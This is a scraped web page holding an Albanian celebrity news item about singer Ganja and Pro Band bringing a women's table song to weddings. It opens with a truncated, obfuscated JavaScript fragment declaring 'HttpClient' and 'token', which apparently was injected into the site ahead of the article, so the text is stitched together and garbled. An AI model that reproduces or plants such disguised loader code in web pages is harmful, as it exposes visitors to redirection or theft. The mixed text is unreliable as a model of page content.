;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Ganja vendos standard të ri në dasmat shqiptare: Bën diçka të paparë më herët (FOTO)

By

Këngëtarë të shumtë në numër, tashmë me sezonin veror të dasmave, vazhdimisht po ekspozojnë në rrjete sociale momente nga këto ahengje familjare.

Video e foto nga atmosfera, me plan të parë këngëtarët e veshjet e tyre po na shoqërojnë çdo ditë me të hapur rrjetet sociale Facebook dhe Instagram.

Por, përtej pompozitetit mediatik, është këngëtarja Ganimete Abazi – Ganja ajo që së bashku me Pro Band po shkruajnë standarte të reja në evenimentet e dasmave shqiptare.

Këngëtarja e shumë hiteve ka menduar që për të parën herë të bëj diçka inovative që shkrin stereotipet gjinore mes shqiptarëve. Në një foto që ka siguruar Prive.al, Ganja shihet përreth shumë grave me mikrofon në dorë në sofrën, mbledhi deri tani e paparë mes femrave dhe tipike vetëm për burrat.

Ky hap ka rezultuar një gjetje e duhur që është pëlqyer nga të pranishmit që si shumë të tjerë, i kanë besuar Ganes dhe Pro Band atmosferën në mbrëmjen më të veçantë të jetës së tyre. /Prive.al/

1469970063908

Artikuj të ngjashëm